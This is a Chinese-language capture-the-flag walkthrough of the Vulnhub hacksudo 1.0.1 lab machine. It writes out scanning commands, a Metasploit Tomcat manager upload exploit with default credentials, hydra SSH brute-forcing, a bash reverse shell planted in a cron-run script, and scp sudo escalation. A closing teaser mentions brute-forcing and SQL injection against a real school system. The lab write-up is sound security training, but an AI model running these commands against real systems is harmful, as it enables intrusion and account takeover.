Vlunhub-Hacksudo系列1.0.1

靶机环境

这个靶机是hacksudo系列的第一部。

靶机名称：Hacksudo1.0.1 IP地址为：192.168.17.143

攻击机：kali2021 IP地址为：192.168.17.131

主机发现

nmap -sC -sV -p- 192.168.17.143

发现开通了80、2222、8080三个端口。

进攻

使用gobuster来扫描网站后台包含html,txt,php的页面

gobuster dir -u http://192.168.17.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php

我们查看一些info.txt看一下能不能发现有用的信息。

发现了邮箱以及密码，我们进入/index.php将邮箱和密码登录查看一下

登录成功发现是一个静态页面，没有发现可以跳转的界面，我们姑且先搁置找一下其他的突破点。

突然想起来扫描出来的目录里面还有user.sql呢，我们下载下来看看

wget http://192.168.17.143/user.sql

运行file命令，我们可以推断出它是一个简单的文本文件

我们直接使用vim编辑器查看一下

发现一个用户名和密码都是admin，这个是初始的用户名和密码，这可能是某一处的用户名和密码留着备用。

我们访问网站的8080端口：

这里有Manager App，我们点击去看一下。

需要输入用户名密码，我们尝试用admin作为用户名和密码尝试登录一下，发现可以登录成功！

我们这知道Apache的版本为2.4.6，应该会一些已知可利用的漏洞，这就好办了，我们可以使用Metasploit检测一下它是否有文件上传漏洞。

在Metasploit中，我们将使用exploit / multi / http / tomcat_mgr_upload

use exploit/multi/http/tomcat_mgr_upload

shwo options

发现漏洞利用的时，需要输入用户名和密码，目标的IP地址，以及端口号。

set HttpPassword admin
set HttpUsername admin
set RHOSTS 192.168.17.143
set RPORT 8080
exploit

我们成功获得一个shell，我们成功拿到tomcat用户的权限

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

让我们的shell更稳定一些同时导入xterm.

提权

进入home目录，发现有两个用户名，分别是hacksudo、vishal，靶机开通了ssh服务，端口为2222，我们尝试使用hydra对vishal用户以及hacksudo用户进行爆破,我们成功拿到了vishal用户的密码为hacker。

hydra -l vishal -w 10 -P passlist.txt -t 10 -v -f 192.168.17.143 ssh -s 2222

使用ssh进行连接，这里要注意的是，ssh使用的不是默认的端口，应该指定2222端口进行访问。

```
ssh -p 2222 [email protected]

```

此时我们已经拿到了vishal用户的权限，让我们进入/home/vishal目录下查看一下里面的文件

我们使用pspy64来查看一些系统后台运行的进程，这里使用使用Xftp将pspy64发送的靶机的/home/vishal文件夹中。

给pspy64添加执行权限并执行。

发现每两分钟都会执行manage.sh脚本

我们的vishal用户对manage.sh拥有写入的权限。

将bash -i >& /dev/tcp/192.168.17.131/4455 0>&1写入到manage.sh

kali端监听4455端口nc -nlvp 4455

等待两分钟左右，我们拿到hacksudo的用户权限

使用sudo -l发现可以利用scp进行SUID提权

在gtfobins上查询scp利用的方法

成功拿下root权限！

大功告成，成功获得flag~

相关推荐: Lower-SQL至系统沦陷

在一次edusrc挖掘中，发现了一个系统，对于学校来讲算是及其重要的一个系统，其中部署这大批量的教师+学生信息 同时这个功能点的验证码可以被绕过，拦截重放Intruder进行BP爆破，献上我的大字典并没有任何结果，阿巴阿巴.... 爆破无法成功，尝试一波sql…